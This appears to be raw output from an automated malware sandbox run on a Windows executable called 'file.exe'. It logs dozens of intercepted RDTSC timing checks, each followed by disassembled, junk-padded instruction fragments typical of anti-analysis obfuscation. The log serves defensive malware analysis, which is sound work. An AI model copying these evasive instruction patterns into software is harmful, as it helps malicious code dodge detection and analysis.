                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB91E6 second address: FB91F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB958FCD446h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB91F3 second address: FB9202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B0701Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9202 second address: FB9206 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB94F9 second address: FB94FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB94FD second address: FB9548 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 jmp 00007FB958FCD453h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FB958FCD459h 0x00000013 jnl 00007FB958FCD452h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB9548 second address: FB9555 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64AA6 second address: F64AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F64AAA second address: F64AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE95A second address: FBE964 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB958FCD446h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B33 second address: F84B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B37 second address: F84B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD451h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d lea eax, dword ptr [ebp+12486849h] 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FB958FCD448h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D5ABBh], eax 0x00000033 push eax 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 pop eax 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8510D second address: F85113 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85113 second address: F8511A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8511A second address: DD1D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, ebx 0x0000000c push dword ptr [ebp+122D142Dh] 0x00000012 pushad 0x00000013 cld 0x00000014 add dword ptr [ebp+12448A47h], eax 0x0000001a popad 0x0000001b call dword ptr [ebp+122D1BCDh] 0x00000021 pushad 0x00000022 jmp 00007FB958B07024h 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a jbe 00007FB958B0701Ch 0x00000030 mov bx, 2835h 0x00000034 popad 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 jmp 00007FB958B0701Fh 0x0000003e mov dword ptr [ebp+122D3A7Ch], eax 0x00000044 stc 0x00000045 mov esi, 0000003Ch 0x0000004a jc 00007FB958B0701Ch 0x00000050 add esi, dword ptr [esp+24h] 0x00000054 sub dword ptr [ebp+122D3374h], ecx 0x0000005a mov dword ptr [ebp+122D2BBDh], ebx 0x00000060 lodsw 0x00000062 jmp 00007FB958B0701Ch 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b stc 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 jmp 00007FB958B0701Ch 0x00000075 nop 0x00000076 push edi 0x00000077 pushad 0x00000078 jng 00007FB958B07016h 0x0000007e jmp 00007FB958B07028h 0x00000083 popad 0x00000084 pop edi 0x00000085 push eax 0x00000086 push edx 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007FB958B07020h 0x0000008e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F852E2 second address: F852FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958FCD457h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F852FD second address: F85345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], esi 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FB958B07018h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 sub dword ptr [ebp+122D1B3Eh], edi 0x0000002e push eax 0x0000002f jns 00007FB958B07028h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85345 second address: F85349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F855F6 second address: F85606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8599F second address: F859CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 jo 00007FB958FCD459h 0x0000000f call 00007FB958FCD452h 0x00000014 pop ecx 0x00000015 push 0000001Eh 0x00000017 sub dword ptr [ebp+122D2269h], ecx 0x0000001d nop 0x0000001e push edi 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85D18 second address: F85D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007FB958B07027h 0x00000010 nop 0x00000011 mov cx, di 0x00000014 lea eax, dword ptr [ebp+1248688Dh] 0x0000001a jmp 00007FB958B0701Ah 0x0000001f nop 0x00000020 pushad 0x00000021 jnc 00007FB958B0701Ch 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85D69 second address: F85DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB958FCD44Ch 0x0000000a popad 0x0000000b push eax 0x0000000c jbe 00007FB958FCD45Fh 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FB958FCD448h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edx, dword ptr [ebp+122D19FAh] 0x00000033 lea eax, dword ptr [ebp+12486849h] 0x00000039 jl 00007FB958FCD44Ch 0x0000003f mov edx, dword ptr [ebp+122D2226h] 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 jne 00007FB958FCD44Ch 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85DE5 second address: F64AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958B07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FB958B07026h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FB958B07018h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a xor cx, BBBAh 0x0000002f call dword ptr [ebp+122D1AF0h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDB14 second address: FBDB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jne 00007FB958FCD44Ch 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBDEFD second address: FBDF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jbe 00007FB958B0701Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE051 second address: FBE057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE057 second address: FBE067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB958B07016h 0x0000000a popad 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE1CB second address: FBE1E2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB958FCD446h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007FB958FCD44Eh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE356 second address: FBE36B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958B0701Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE36B second address: FBE36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE36F second address: FBE373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE373 second address: FBE3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FB958FCD446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push esi 0x00000010 jg 00007FB958FCD446h 0x00000016 jp 00007FB958FCD446h 0x0000001c pop esi 0x0000001d jmp 00007FB958FCD456h 0x00000022 push edx 0x00000023 jmp 00007FB958FCD459h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC661A second address: FC661E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC661E second address: FC6643 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB958FCD44Ah 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68CD second address: FC68D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68D1 second address: FC68D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68D5 second address: FC68DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68DB second address: FC68EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958FCD44Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68EC second address: FC68F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC68F3 second address: FC691B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FB958FCD446h 0x00000011 jmp 00007FB958FCD457h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC691B second address: FC6928 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6928 second address: FC6942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FB958FCD44Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6942 second address: FC6968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07029h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FB958B07016h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC6325 second address: FC632A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7044 second address: FC707C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07023h 0x00000009 jmp 00007FB958B07026h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FB958B07016h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC707C second address: FC7080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7080 second address: FC7084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7084 second address: FC7090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7090 second address: FC7096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7096 second address: FC70C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FB958FCD446h 0x00000011 jmp 00007FB958FCD457h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC721C second address: FC7222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7377 second address: FC7398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jc 00007FB958FCD446h 0x0000000b jc 00007FB958FCD446h 0x00000011 popad 0x00000012 push edi 0x00000013 jne 00007FB958FCD446h 0x00000019 pop edi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC76C9 second address: FC76CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3BAAB second address: F3BAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jng 00007FB958FCD446h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB958FCD44Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD226D second address: FD2271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2271 second address: FD229D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jnp 00007FB958FCD46Fh 0x0000000d jmp 00007FB958FCD457h 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FB958FCD446h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD242D second address: FD2431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2549 second address: FD254D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD254D second address: FD2551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8585F second address: F8587B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB958FCD458h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD298C second address: FD29DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB958B07024h 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FB958B0701Fh 0x00000015 jmp 00007FB958B0701Ah 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FB958B0701Fh 0x00000023 jnl 00007FB958B07016h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD29DF second address: FD29E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD357E second address: FD3587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD3587 second address: FD358D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6A69 second address: FD6A6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6A6D second address: FD6A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FB958FCD446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB958FCD452h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD62F0 second address: FD62FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD677E second address: FD6782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6782 second address: FD6786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD6786 second address: FD67A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FB958FCD448h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB958FCD451h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAF5C second address: FDAF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAF62 second address: FDAF6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDAF6A second address: FDAF8D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB958B07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB958B07025h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB299 second address: FDB2AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ah 0x00000007 jl 00007FB958FCD44Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB2AD second address: FDB2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB2B7 second address: FDB2D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FB958FCD452h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB2D4 second address: FDB2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDDA9F second address: FDDAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE35B5 second address: FE35E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB958B07023h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FB958B0701Ah 0x00000011 jns 00007FB958B0701Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE3728 second address: FE372C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41B6 second address: FE41D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB958B07020h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41D0 second address: FE41D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41D5 second address: FE41FD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB958B07018h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FB958B0701Ch 0x00000011 jp 00007FB958B07016h 0x00000017 push edx 0x00000018 jmp 00007FB958B0701Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE41FD second address: FE421C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB958FCD456h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE44DE second address: FE44E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE44E3 second address: FE44FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FB958FCD446h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jns 00007FB958FCD446h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
